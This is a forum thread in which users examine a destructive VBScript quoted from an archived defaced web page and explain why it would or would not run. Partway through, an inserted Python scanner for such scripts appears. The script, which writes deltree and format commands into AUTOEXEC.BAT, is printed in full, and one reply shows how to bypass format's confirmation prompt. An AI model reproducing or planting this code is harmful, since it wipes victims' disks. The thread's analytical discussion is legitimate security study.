  1. #1
    Junior Member Sigg3
    Join Date
    May 2004
    Posts
    8

    Malicious script in regular html code

    Take a look at this script:

    <script language="VBScript"><!--
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set a = fs.CreateTextFile("C:\AUTOEXEC.BAT", True)
    a.writeline ("copy c:\windows\command\deltree.* c:\")
    a.writeline ("copy c:\windows\command\format.* c:\")
    a.writeline ("cls")
    a.writeline ("Deltree /y windows")
    a.writeline ("cls")
    a.writeline ("Deltree /y meusdo~1")
    a.writeline ("cls")
    a.writeline ("Deltree /y arquiv~1")
    a.writeline ("@echo -=-=-=-=-=-=-=-Computer Hacked by [hacker!]-=-=-=-=-=-")
    a.writeline ("@echo -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-")
    a.writeline ("format c: /q")
    a.Close
    --></script>
    (Quoted because I didn't want to execute it, if such a thing could be possible :P)

    I found it at 2600's hacked pages archive. It was marked as "dangerous to view in IE".

    My question is easy: is it that simple to execute malicious scripts on browsers?
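
A static check for the pattern in the script quoted above, added here as an example and not part of any poster's message: it pulls the script blocks out of an HTML page without executing them and flags instantiation of file-system COM objects and references to boot-time files. The function and class names, the ProgID list and both sample pages are assumptions constructed for this illustration.

```python
import re
from html.parser import HTMLParser

# COM ProgIDs that give page script file-system or process access.
RISKY_PROGIDS = {"scripting.filesystemobject", "wscript.shell"}
CREATE_CALL = re.compile(r"""(?:CreateObject|ActiveXObject)\s*\(\s*["']([^"']+)["']""", re.I)
# Files DOS/Win9x runs at boot: a reference here means delayed execution.
BOOT_FILES = re.compile(r"\\(autoexec\.bat|config\.sys)\b", re.I)

# Constructed sample pages (the risky one only writes a harmless echo line).
SAMPLE_RISKY = r'''<html><script language="VBScript"><!--
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:\AUTOEXEC.BAT", True)
a.writeline ("@echo constructed sample")
--></script></html>'''
SAMPLE_BENIGN = '<html><script type="text/javascript">document.title = "hi";</script></html>'


class ScriptCollector(HTMLParser):
    """Collects (language, body) for every <script> element without running it."""
    def __init__(self):
        super().__init__()
        self.scripts, self._lang, self._buf = [], None, None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._lang = (a.get("language") or a.get("type") or "javascript").lower()
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:  # only keep text that sits inside a script block
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._lang, "".join(self._buf)))
            self._buf = None


def scan_html(html):
    """Return a sorted list of findings for one HTML document."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = set()
    for lang, body in collector.scripts:
        for progid in CREATE_CALL.findall(body):
            if progid.lower() in RISKY_PROGIDS:
                findings.add(f"{lang}: instantiates {progid}")
        if BOOT_FILES.search(body):
            findings.add(f"{lang}: references a boot-time file")
    return sorted(findings)
```

A hit is a reason to review the page in a text editor rather than a browser; whether the script could actually run still depends on the security zone the page is loaded in.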

  2. #2
    Just Another Geek SirDice
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,403
    If I'm not mistaken if you get this to run in the "Local Machine Zone" it'll work.

    http://msdn.microsoft.com/workshop/s...w/overview.asp
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  3. #3
    Senior Member cacosapo
    Join Date
    Apr 2004
    Posts
    1,130
    SirDice (as usual) is correct.
    That script can't run from internet zone - HOWEVER
    From time to time IE "pops up" a new vulnerability on "cross zones" that creates "ways" to run things from one zone on another zone...
    My site

    FORMAT C: Yes ...Yes??? ...Nooooo!!! ^C ^C ^C ^C ^C
    If I die before I sleep, I pray the Lord my soul to encrypt.
    If I die before I wake, I pray the Lord my soul to brake.

  4. #4
    AO Ancient: Team Leader Tiger Shark
    Join Date
    Oct 2002
    Posts
    5,197
    Actually, it isn't going to do much on Win2k and I suspect WinXP either.

    Deltree and format won't be found in c:\windows\command on Win2k. I don't have an XP box on hand right now but I suspect you won't find it on an XP box either.

    Format c: /q should return "Enter current volume label for drive C:" which is a bit of a giveaway.... IIRC, that should be followed by a warning stating that you are about to delete all data on a non-removable drive, do you wish to continue, (even if it is operating within a script)..... Which should get the attention of even the dumbest (L)user........

    Badly written piece of crap? Absolutely!
    Don't SYN us.... We'll SYN you.....
    "A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools." - Thucydides

  5. #5
    Just Another Geek SirDice
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,403
    Originally posted here by Tiger Shark
    Format c: /q should return "Enter current volume label for drive C:" which is a bit of a giveaway.... IIRC, that should be followed by a warning stating that you are about to delete all data on a non-removable drive, do you wish to continue, (even if it is operating within a script)..... Which should get the attention of even the dumbest (L)user........
    Easily defeated by creating a textfile with an "Y" in it and doing a
    Code:
    format c: /q < yes.txt
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  6. #6
    AO Ancient: Team Leader Tiger Shark
    Join Date
    Oct 2002
    Posts
    5,197
    Originally posted here by SirDice
    Easily defeated by creating a textfile with an "Y" in it and doing a

    Undoubtedly..... So the author didn't really think this through did he.....
    Don't SYN us.... We'll SYN you.....
    "A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools." - Thucydides

  7. #7
    Just Another Geek SirDice
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,403
    Yeah. Oh well. At least Sigg3 learned something (I hope)

    Hehehe. There's more wrong with this script. It's kinda overkill. Why remove the windows dir if you're going to format the complete drive anyway?

    Welcome to AO btw (I keep forgetting my manners)
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  8. #8
    Junior Member Sigg3
    Join Date
    May 2004
    Posts
    8
    This was back in y2k, tho.
    Don't think 2600 would've posted a warning without a reason.

    Thanks for the replies, gentlemen.

  9. #9
    AO French Antique News Whore SDK
    Join Date
    Aug 2001
    Posts
    2,126
    Originally posted here by Tiger Shark
    Actually, It isn't going to do much on Win2k and I suspect WinXP either.

    Deltree and format won't be found in c:\windows\command on Win2k. I don't have an XP box on hand right now but I suspect you won't find it on an XP box either.

    Format c: /q should return "Enter current volume label for drive C:" which is a bit of a giveaway.... IIRC, that should be followed by a warning stating that you are about to delete all data on a non-removable drive, do you wish to continue, (even if it is operating within a script)..... Which should get the attention of even the dumbest (L)user........

    Badly written piece of crap? Absolutely!
    True... Deltree is not included in 2000/XP.
    -Simon "SDK"
